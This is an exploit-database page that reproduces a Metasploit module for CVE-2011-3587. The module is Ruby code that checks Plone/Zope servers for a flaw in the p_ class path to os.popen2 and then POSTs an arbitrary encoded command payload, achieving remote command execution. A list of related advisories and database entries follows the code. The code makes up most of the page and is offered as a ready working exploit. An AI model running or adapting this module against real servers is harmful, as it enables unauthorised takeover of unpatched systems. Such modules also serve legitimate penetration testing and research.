Lucene search
TecR0cPACKETSTORM:108200HistoryDec 28, 2011 - 12:00 a.m.
Plone and Zope Remote CMD Injection Exploit
2011-12-2800:00:00
TecR0c
packetstormsecurity.com
104
0.969 High
EPSS
Percentile
99.7%
`##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Plone and Zope Remote CMD Injection Exploit',
'Description' => %q{
Unspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x
through 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute
arbitrary commands via vectors related to the p_ class in OFS/misc_.py and
the use of Python modules.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Plone Security team', # Vulnerability discovery
'Nick Miles', # Original exploit
'TecR0c' # Metasploit module
],
'References' =>
[
['CVE', '2011-3587'],
['URL', 'http://www.exploit-db.com/exploits/18262/'],
['URL', 'http://plone.org/products/plone/security/advisories/20110928']
],
'Privileged' => false,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet perl ruby',
}
},
'Platform' => ['unix', 'linux'],
'Arch' => ARCH_CMD,
'Targets' => [['Automatic',{}]],
'DisclosureDate' => 'Oct 04 2011',
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(8080),
OptString.new('URI',[true, "The path to the Plone installation", "/"]),
],self.class)
register_autofilter_ports([ 8080 ])
end
def check
uri = datastore['URI']
uri << '/' if uri[-1,1] != '/'
uri << 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2'
res = send_request_raw(
{
'uri' => uri
}, 25)
if (res.headers['Bobo-Exception-Type'] =~ /zExceptions.BadRequest/)
return Exploit::CheckCode::Vulnerable
end
# patched == zExceptions.NotFound
return Exploit::CheckCode::Safe
end
def exploit
uri = datastore['URI']
uri << '/' if uri[-1,1] != '/'
uri << 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2'
send_request_cgi(
{
'method' => 'POST',
'uri' => uri,
'vars_post' =>
{
'cmd' => payload.encoded,
}
}, 0.5) # short timeout, we don't care about the response
end
end
`
Related
exploitpack
exploitpack
Plone and Zope - Remote Command Execution
2011-12-21 00:00:00
nvd
nvd
CVE-2011-3587
2011-10-10 10:55:06
CVE-2011-4030
2011-10-10 10:55:06
saint
saint
Plone Zope SAXutils Command Execution
2012-01-13 00:00:00
Plone Zope SAXutils Command Execution
2012-01-13 00:00:00
Plone Zope SAXutils Command Execution
2012-01-13 00:00:00
seebug
seebug
Plone and Zope Remote Command Execution PoC
2014-07-01 00:00:00
Zopeζ‘ζΆ"cmd"εζ°θΏη¨ε½δ»€ζ§θ‘ζΌζ΄
2011-12-26 00:00:00
prion
prion
Design/Logic Flaw
2011-10-10 10:55:00
Design/Logic Flaw
2011-10-10 10:55:00
d2
d2
DSquare Exploit Pack: D2SEC_ZOPEPLONE
2011-10-10 10:55:00
checkpoint_advisories
checkpoint_advisories
Plone and Zope cmd Parameter Remote Command Execution (CVE-2011-3587)
2014-11-02 00:00:00
github
github
Zope Command Execution Vulnerability
2022-05-17 05:37:39
cvelist
cvelist
CVE-2011-3587
2011-10-10 10:00:00
CVE-2011-4030
2011-10-10 10:00:00
cve
cve
CVE-2011-3587
2011-10-10 10:55:06
CVE-2011-4030
2011-10-10 10:55:06
canvas
canvas
Immunity Canvas: PLONE
2011-10-10 10:55:00
nessus
nessus
Plone Request Parsing Remote Command Execution
2011-12-20 00:00:00
dsquare
dsquare
Plone RCE
2012-01-26 00:00:00
packetstorm
packetstorm
Plone / Zope Remote Command Execution
2011-12-21 00:00:00
osv
osv
Zope Command Execution Vulnerability
2022-05-17 05:37:39
exploitdb
exploitdb
Plone and Zope - Remote Command Execution
2011-12-21 00:00:00